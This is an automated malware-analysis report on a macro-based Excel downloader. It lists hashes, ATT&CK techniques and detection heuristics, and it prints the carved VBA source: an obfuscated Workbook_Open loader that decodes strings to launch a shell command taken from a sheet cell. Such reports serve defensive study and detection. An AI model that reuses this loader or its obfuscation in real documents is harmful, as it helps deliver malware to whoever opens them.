Xls.Downloader.Valyria-6934924-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 cb77406434c4aaac…

MALICIOUS

Office (OLE)

Size: 370.5 KB
Created: 2018-10-19 06:24:48
Authoring application: Microsoft Excel
First seen: 2019-01-20
MD5: 1169e5e198d7bb88b6e2aa98a22aac13
SHA-1: 4fad090dd0d09a8b977a4b302ff2a6cd3e008dc1
SHA-256: cb77406434c4aaacbc5e8d0f0fd1745ee60e917403c35ae9b0a1ad3e222c7414
Risk Score: 342

Malware Insights

Xls.Downloader.Valyria-6934924-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution

The file contains both VBA and Excel 4.0 macros, with a Workbook_Open event triggering an obfuscated loader. This loader uses CreateObject and CallByName, indicative of executing a secondary payload. The presence of the 'SE_ENABLE_LURE' heuristic suggests the document prompts the user to enable macros, a common tactic for macro-based downloaders. ClamAV detection further confirms its malicious nature as 'Xls.Downloader.Valyria-6934924-0'.

Heuristics 10

  • ClamAV: Xls.Downloader.Valyria-6934924-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Downloader.Valyria-6934924-0
  • VBA macros detected [medium] (OLE_VBA_MACROS), 5 related findings
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro [high] (OLE_VBA_WBOPEN)
    Workbook_Open macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • CallByName call [high] (OLE_VBA_CALLBYNAME)
    CallByName call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present [medium] (OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Macro/content-enable lure [medium] (SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://ns.adobe.com/xap/1.0/ [In document text (OLE body)]
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/mm/ [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# [In document text (OLE body)]
    • http://ns.adobe.com/photoshop/1.0/ [In document text (OLE body)]
    • http://purl.org/dc/elements/1.1/ [In document text (OLE body)]
    • http://www.iec.ch [In document text (OLE body)]

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 228 bytes
SHA-256: 7664351f0a0d85b9abaa375dfe4e7ba4453b8cb00ee46cd0afc63112dacb94a2
Preview (first 1,000 lines of the extracted script):
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Nov
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2671 bytes
SHA-256: 6fc84dcbbca39ba9c98d89370fde61bf4ec60ceffb3047a79c21459c8b14f80a
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function B_(ByVal T_ As String)
Dim AG_ As String: Dim DBO_ As Long: For DBO_ = 1 To Len(T_) Step 2: AG_ = AG_ & Chr(Val(Chr(23 + (9 * 2) - (1 * 3)) & Chr((20 * 3) + 16 - (24 / 2) + 8) & Mid(T_, DBO_, 2)) - 46): Next: B_ = AG_
End Function
Sub Workbook_Open()
Dim YTVW_ As Long: YTVW_ = 46
Dim LXMU_ As Long
Select Case YTVW_
Case 37 + (73 - 91) + 85 * Round(66 / 55 - 96) * 49
LXMU_ = 3056 - 68
Case 38 / Round(74 * 52 / 44) / 62 + (10 - 30) + 84
LXMU_ = 4932 + 53
Case 75 + (89 - 99) + 51 / Round(83 * 13 / 63) / 55 + (88 - 66) + 21
LXMU_ = 8956 * 95
Case 73 - (83 + 84) - 63 + (97 - 95) + 95
LXMU_ = 5582 * 62
Case 38 + (86 - 68) + 39 / Round(53 * 98 / 42) / 27
LXMU_ = 1491 + 82
Case 89 * Round(66 / 25 - 66) * 9 * Round(15 / 67 - 60) * 31
LXMU_ = 1721 + 47
Case 71 + (25 - 43) + 49 - (85 + 29) - 57 / Round(92 * 21 / 40) / 74
LXMU_ = 8874 + 21
Case 24 + (33 - 41) + 43 * Round(25 / 23 - 84) * 19
LXMU_ = 2807 / 73
Case 25 / Round(81 * 79 / 62) / 61 * Round(47 / 91 - 74) * 46
LXMU_ = 3103 / 12
Case 41 + (17 - 94) + 17 + (42 - 23) + 72 / Round(47 * 9 / 29) / 79
LXMU_ = 2663 / 44
Case 55 * Round(95 / 38 - 84) * 78 - (27 + 37) - 97 * Round(48 / 17 - 42) * 77
LXMU_ = 6816 + 47
Case 22 - (73 + 26) - 36 * Round(25 / 94 - 27) * 62
LXMU_ = 4179 / 79
Case 33 * Round(54 / 32 - 88) * 87 / Round(71 * 46 / 57) / 42 / Round(17 * 49 / 53) / 42
LXMU_ = 1087 * 79
Case 62 + (41 - 11) + 38 - (98 + 10) - 51 / Round(14 * 89 / 73) / 65
LXMU_ = 3678 * 22
Case 83 - (54 + 68) - 96 / Round(41 * 72 / 56) / 75 + (86 - 54) + 43
LXMU_ = 444 + 58
Case 26 - (44 + 64) - 69 / Round(25 * 23 / 80) / 54
LXMU_ = 6807 + 56
Case 70 + (68 - 78) + 45 + (77 - 87) + 20 / Round(60 * 20 / 58) / 51
LXMU_ = 2377 + 32
Case 95 * Round(56 / 42 - 94) * 46 + (46 - 86) + 81
LXMU_ = 2375 - 71
Case 64 + (86 - 81) + 17 + (62 - 68) + 95 * Round(84 / 41 - 46) * 38
LXMU_ = 3225 + 31
Case 17 / Round(77 * 74 / 15) / 21 / Round(14 * 80 / 69) / 67 + (54 - 23) + 64
LXMU_ = 2504 / 34
Case 97 * Round(54 / 43 - 12) * 49 * Round(25 / 61 - 28) * 55 + (43 - 81) + 18
LXMU_ = 7291 / 14
Case 26 - (84 + 68) - 75 / Round(32 * 82 / 33) / 96
LXMU_ = 1330 * 77
Case Else: CallByName CreateObject(B_("858191A0979EA25C8196939A9A")), B_("80A39C"), VbMethod, B_(ThisWorkbook.Sheets("Nova").Range("H231").Value), 0, True
End Select
End Sub